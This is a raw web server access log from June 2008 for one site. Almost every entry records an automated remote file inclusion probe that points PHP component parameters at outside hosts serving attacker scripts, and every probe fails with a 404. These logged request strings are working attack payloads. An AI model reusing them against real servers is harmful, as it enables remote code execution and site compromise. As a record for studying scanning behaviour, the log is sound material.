65.55.208.24 - - [08/Jun/2008:17:33:14 -0700] "GET /tmp/?S=D HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
209.216.213.115 - - [08/Jun/2008:17:33:23 -0700] "GET /logs/access_070917.log/components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
209.216.213.115 - - [08/Jun/2008:17:33:23 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
209.216.213.115 - - [08/Jun/2008:17:33:24 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:17:33:27 -0700] "GET /logs/access_071112.log/modules/xfsection/modify.php?dir_module=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:17:33:27 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:17:33:27 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
209.216.213.115 - - [08/Jun/2008:17:33:30 -0700] "GET /logs/access_071022.log/components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:17:33:33 -0700] "GET /logs/access_071112.log/modules/xfsection/modify.php?dir_module=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:17:33:33 -0700] "GET /modules/xfsection/modify.php?dir_module=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:17:33:33 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
210.104.34.234 - - [08/Jun/2008:17:34:38 -0700] "GET /logs/access.log/index.php?url=http://www.haiagaros.info/x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
210.104.34.234 - - [08/Jun/2008:17:34:38 -0700] "GET /index.php?url=http://www.haiagaros.info/x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
210.104.34.234 - - [08/Jun/2008:17:34:39 -0700] "GET /logs/index.php?url=http://www.haiagaros.info/x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
62.140.19.142 - - [08/Jun/2008:17:35:03 -0700] "GET /logs/access.log/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
62.140.19.142 - - [08/Jun/2008:17:35:03 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
62.140.19.142 - - [08/Jun/2008:17:35:03 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
87.106.16.18 - - [08/Jun/2008:17:36:57 -0700] "GET /logs/access_070924.log/index.php?p=http://www.safonov.sumy.ua/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
72.29.83.181 - - [08/Jun/2008:17:37:03 -0700] "GET /logs/access_080519.log//index.php?option=com_custompages&cpage=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
62.65.159.210 - - [08/Jun/2008:17:41:39 -0700] "GET /logs/access_070924.log/modules/xfsection/modify.php?dir_module=http://rjoos.ch:/Reise/images/tOtti/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
69.0.211.58 - - [08/Jun/2008:17:42:00 -0700] "GET /logs/access_071112.log/modules/xfsection/modify.php?dir_module=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
69.0.211.58 - - [08/Jun/2008:17:42:00 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
69.0.211.58 - - [08/Jun/2008:17:42:00 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
209.240.231.154 - - [08/Jun/2008:17:42:22 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.clubdelbarman.com/images/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.240.231.154 - - [08/Jun/2008:17:42:28 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.clubdelbarman.com/images/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.240.231.154 - - [08/Jun/2008:17:42:33 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.clubdelbarman.com/images/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.220.144.161 - - [08/Jun/2008:17:44:19 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
83.220.144.161 - - [08/Jun/2008:17:44:19 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
83.220.144.130 - - [08/Jun/2008:17:44:54 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
83.220.144.130 - - [08/Jun/2008:17:44:54 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
198.173.255.213 - - [08/Jun/2008:17:45:08 -0700] "GET /logs/access_071224.log/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.purjus.fr/actedeco/me.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
69.0.211.58 - - [08/Jun/2008:17:45:16 -0700] "GET /logs/access_070924.log/modules/xfsection/modify.php?dir_module=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
209.240.231.154 - - [08/Jun/2008:17:45:46 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.clubdelbarman.com/images/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.240.231.154 - - [08/Jun/2008:17:46:12 -0700] "GET /logs/access_071021.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.clubdelbarman.com/images/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.237.231.200 - - [08/Jun/2008:17:46:25 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.summitcircle.com"
209.237.231.200 - - [08/Jun/2008:17:46:25 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.summitcircle.com"
209.240.231.154 - - [08/Jun/2008:17:47:25 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.clubdelbarman.com/images/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
209.216.213.115 - - [08/Jun/2008:17:48:29 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
195.32.96.7 - - [08/Jun/2008:17:49:16 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
195.32.96.7 - - [08/Jun/2008:17:50:32 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
195.32.96.7 - - [08/Jun/2008:17:50:33 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
195.32.96.7 - - [08/Jun/2008:17:50:33 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
87.22.37.144 - - [08/Jun/2008:17:51:12 -0700] "GET /logs/access_070917.log/components/com_simpleboard/image_upload.php?sbp=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.22.37.144 - - [08/Jun/2008:17:51:12 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.22.37.144 - - [08/Jun/2008:17:51:13 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.22.37.144 - - [08/Jun/2008:17:51:14 -0700] "GET /logs/access_071022.log/components/com_simpleboard/image_upload.php?sbp=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
147.32.229.11 - - [08/Jun/2008:17:51:26 -0700] "GET /logs/access_071224.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
147.32.229.11 - - [08/Jun/2008:17:51:26 -0700] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
147.32.229.11 - - [08/Jun/2008:17:51:27 -0700] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.65.159.210 - - [08/Jun/2008:17:51:50 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://rjoos.ch:/Reise/images/tOtti/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "summitcircle.com"
62.140.19.142 - - [08/Jun/2008:17:52:14 -0700] "GET /logs/access_080127.log/inc/cmses/aedating4CMS.php?dir[inc]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
62.140.19.142 - - [08/Jun/2008:17:52:14 -0700] "GET /inc/cmses/aedating4CMS.php?dir[inc]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
62.140.19.142 - - [08/Jun/2008:17:52:14 -0700] "GET /logs/inc/cmses/aedating4CMS.php?dir[inc]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
62.140.19.142 - - [08/Jun/2008:17:52:18 -0700] "GET /logs/access_080121.log/inc/cmses/aedating4CMS.php?dir[inc]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
207.58.160.45 - - [08/Jun/2008:17:53:08 -0700] "GET /logs/access_070917.log/components/com_simpleboard/image_upload.php?sbp=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
207.58.160.45 - - [08/Jun/2008:17:53:08 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
207.58.160.45 - - [08/Jun/2008:17:53:08 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
207.58.160.45 - - [08/Jun/2008:17:53:09 -0700] "GET /logs/access_071022.log/components/com_simpleboard/image_upload.php?sbp=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
87.22.37.144 - - [08/Jun/2008:17:53:37 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.22.37.144 - - [08/Jun/2008:17:53:37 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.22.37.144 - - [08/Jun/2008:17:53:37 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
147.32.229.11 - - [08/Jun/2008:17:53:57 -0700] "GET /logs/access_071224.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
147.32.229.11 - - [08/Jun/2008:17:53:58 -0700] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
147.32.229.11 - - [08/Jun/2008:17:53:58 -0700] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
195.32.96.7 - - [08/Jun/2008:17:54:12 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
87.22.37.144 - - [08/Jun/2008:17:54:23 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
207.58.160.45 - - [08/Jun/2008:17:54:49 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
87.106.84.245 - - [08/Jun/2008:17:55:17 -0700] "GET /logs/access.log/index.php?pag=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.106.84.245 - - [08/Jun/2008:17:55:17 -0700] "GET /index.php?pag=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.106.84.245 - - [08/Jun/2008:17:55:18 -0700] "GET /logs/index.php?pag=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.106.16.18 - - [08/Jun/2008:17:56:29 -0700] "GET /logs/access_070917.log/index.php?p=http://www.safonov.sumy.ua/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
195.32.96.7 - - [08/Jun/2008:17:56:49 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/i3/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.summitcircle.com"
195.32.96.7 - - [08/Jun/2008:17:56:49 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/i3/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.summitcircle.com"
87.22.37.144 - - [08/Jun/2008:17:57:28 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.22.37.144 - - [08/Jun/2008:17:58:58 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
70.86.212.146 - - [08/Jun/2008:17:59:12 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
62.133.207.2 - - [08/Jun/2008:17:59:22 -0700] "GET //include/bbs.lib.inc.php?site_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.22.37.144 - - [08/Jun/2008:18:00:15 -0700] "GET /logs/access_071001.log//modules/vwar/admin/admin.php?vwar_root=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.133.207.2 - - [08/Jun/2008:18:00:34 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.133.207.2 - - [08/Jun/2008:18:00:34 -0700] "GET //include/bbs.lib.inc.php?site_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.133.207.2 - - [08/Jun/2008:18:00:35 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.86.212.146 - - [08/Jun/2008:18:01:43 -0700] "GET /logs/access_080323.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.86.212.146 - - [08/Jun/2008:18:01:43 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
87.22.37.144 - - [08/Jun/2008:18:01:52 -0700] "GET /logs/access_071210.log/index.php?body=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
69.61.106.42 - - [08/Jun/2008:18:01:53 -0700] "GET /logs/access_071022.log/news.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
69.61.106.42 - - [08/Jun/2008:18:01:53 -0700] "GET /news.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
69.61.106.42 - - [08/Jun/2008:18:01:53 -0700] "GET /logs/news.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
87.22.37.144 - - [08/Jun/2008:18:01:53 -0700] "GET /index.php?body=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.22.37.144 - - [08/Jun/2008:18:01:53 -0700] "GET /logs/index.php?body=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
209.240.231.154 - - [08/Jun/2008:18:02:03 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.clubdelbarman.com/images/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.22.37.144 - - [08/Jun/2008:18:02:06 -0700] "GET /logs/access_071008.log/index.php?body=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
209.240.231.154 - - [08/Jun/2008:18:02:08 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.clubdelbarman.com/images/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.61.106.42 - - [08/Jun/2008:18:02:38 -0700] "GET /logs/access.log/news.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
70.86.5.10 - - [08/Jun/2008:18:04:17 -0700] "GET /index.php?body=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.summitcircle.com"
70.86.5.10 - - [08/Jun/2008:18:04:17 -0700] "GET /logs/index.php?body=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.summitcircle.com"
210.48.67.39 - - [08/Jun/2008:18:04:36 -0700] "GET /logs/access_071210.log/index.php?body=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.48.67.39 - - [08/Jun/2008:18:04:37 -0700] "GET /index.php?body=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.48.67.39 - - [08/Jun/2008:18:04:37 -0700] "GET /logs/index.php?body=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.86.5.10 - - [08/Jun/2008:18:04:45 -0700] "GET /index.php?body=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
210.48.67.39 - - [08/Jun/2008:18:04:53 -0700] "GET /logs/access_071008.log/index.php?body=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
147.32.229.11 - - [08/Jun/2008:18:06:44 -0700] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
195.32.96.7 - - [08/Jun/2008:18:07:16 -0700] "GET /logs/access_080121.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
195.32.96.7 - - [08/Jun/2008:18:07:16 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
195.32.96.7 - - [08/Jun/2008:18:07:17 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
195.32.96.7 - - [08/Jun/2008:18:07:52 -0700] "GET /index.php?body=http://h1.ripway.com/i3/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.summitcircle.com"
195.32.96.7 - - [08/Jun/2008:18:07:52 -0700] "GET /logs/index.php?body=http://h1.ripway.com/i3/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.summitcircle.com"
81.52.143.16 - - [08/Jun/2008:18:08:01 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)" "www.summitcircle.com"
81.52.143.16 - - [08/Jun/2008:18:08:07 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)" "www.summitcircle.com"
147.32.229.11 - - [08/Jun/2008:18:08:34 -0700] "GET /logs/access_071112.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
137.164.143.110 - - [08/Jun/2008:18:08:48 -0700] "GET /logs/access_070528.log HTTP/1.0" 404 275 "http://www.summitcircle.com/logs/access_070528.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)" "www.summitcircle.com"
